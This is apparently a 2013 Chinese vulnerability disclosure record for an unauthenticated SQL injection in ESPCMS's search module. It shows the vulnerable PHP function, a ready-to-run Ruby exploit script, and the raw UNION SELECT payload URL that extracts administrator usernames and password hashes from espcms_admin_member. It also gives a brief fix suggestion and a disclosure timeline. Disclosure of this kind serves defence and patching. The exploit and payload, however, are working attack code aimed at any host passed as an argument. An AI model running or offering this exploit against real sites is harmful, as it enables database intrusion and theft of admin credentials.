2013-06-25: 细节已通知厂商并且等待厂商处理中 2013-06-25: 厂商已经确认,细节仅向厂商公开 2013-06-28: 细节向第三方安全合作伙伴开放 2013-08-19: 细节向核心白帽子及相关领域专家公开 2013-08-29: 细节向普通白帽子公开 2013-09-08: 细节向实习白帽子公开 2013-09-23: 细节向公众公开
无需认证,直接爆数据
和wap模块下的SQL注入原理一样,都是从$_SERVER['QUERY_STRING']中去取变量导致绕过过滤的情况。在/interface/search.php文件的in_result函数中:
function in_result() { ... ... ... ... ... ... ... ... ... $urlcode = $_SERVER[ 'QUERY_STRING ']; parse_str(html_entity_decode($urlcode), $output); ... ... ... ... ... ... ... ... ... if (is_array($output['attr' ]) && count($output['attr']) > 0) { $db_table = db_prefix . 'model_att'; foreach ($output['attr' ] as $key => $value) { if ($value) { $key = addslashes($key); $key = $this-> fun->inputcodetrim($key); $db_att_where = " WHERE isclass=1 AND attrname='$key'"; $countnum = $this->db_numrows($db_table, $db_att_where); if ($countnum > 0) { $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ; } } } } if (!empty ($keyword) && empty($keyname)) { $keyname = 'title'; $db_where.= " AND a.title like '%$keyword%'" ; } elseif (!empty ($keyword) && !empty($keyname)) { $db_where.= " AND $keyname like '% $keyword%'"; } $pagemax = 15; $pagesylte = 1; if ($countnum > 0) { $numpage = ceil($countnum / $pagemax); } else { $numpage = 1; } $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax; $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0); $sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql); ... ... ... ... ... ... ... ... ... }
PoC:
require "net/http"require "uri"def request(method, url) if method.eql?("get") uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) response = http.request(Net::HTTP::Get.new(uri.request_uri)) return response endenddoc =<<HERE-------------------------------------------------------Espcms Inejction ExploitAuthor:ztzBlog:http://ztz.fuzzexp.org/-------------------------------------------------------HEREusage =<<HEREUsage: ruby #{$0} host port pathexample: ruby #{$0} www.target.com 80 /HEREputs docif ARGV.length < 3 puts usageelse $host = ARGV[0] $port = ARGV[1] $path = ARGV[2] puts "[*]send request..." url = "http://#{$host}:#{$port}#{$path}index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23" response = request("get", url) result = response.body.scan(/\w+&\w{32}/) puts resultend
index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23
把过滤点放到mysql_query入口,而不是程序入口
危害等级:高
漏洞Rank:10
确认时间:2013-06-25 18:14
感谢!
暂无